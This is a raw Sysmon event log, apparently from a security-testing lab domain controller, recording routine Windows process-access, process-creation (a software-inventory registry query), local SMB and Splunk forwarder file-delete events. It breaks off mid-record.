12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64AA-6064-8D00-00000000AE01}4948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.611{266CAFBE-64AA-6064-8B00-00000000AE01}23404272C:\Windows\system32\cmd.exe{266CAFBE-64AA-6064-8D00-00000000AE01}4948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\msvcrt.dll+4ba7c|C:\Windows\system32\cmd.exe+103c4|C:\Windows\system32\cmd.exe+10910|C:\Windows\system32\cmd.exe+c36d|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.626{266CAFBE-64AA-6064-8D00-00000000AE01}4948C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64AA-6064-8B00-00000000AE01}2340C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd configure 10341000x80000000000000003664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-64AA-6064-8C00-00000000AE01}44163324C:\Windows\system32\conhost.exe{266CAFBE-64AA-6064-8B00-00000000AE01}2340C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64AA-6064-8C00-00000000AE01}4416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64AA-6064-8B00-00000000AE01}2340C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-1000-00000000AE01}11242344C:\Windows\system32\svchost.exe{266CAFBE-64AA-6064-8B00-00000000AE01}2340C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e0a4|c:\windows\system32\UBPM.dll+11662|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000003692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:47.283{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B66C6A1B6F2BE1EB56ECA858E40DE1DA,SHA256=E1EF3485686063AD68E6B5623475381245F19250093BC7E49A0CF1EA21685238,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.264{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58086-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.264{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58086-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 23542300x80000000000000003693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:48.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C6A56423129B5950AEF5617D9981B4A,SHA256=E9D4A086AC03C047E490372CAE984634EA94EA7389AB9215DE963873F6B7235F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:49.658{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ECF05E542793234C45DCF49546E1500,SHA256=C45A7614405E2434106AB97F61DDF67DBCC834A895D82710A5D23B1A1EDAA09C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:50.689{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2732D91B2C3EEE1A6C41E1200A53118E,SHA256=24072886F4586B7A469604903486CFB36012C8EAE10195F9CFC7B8B56E6C1849,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:51.845{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 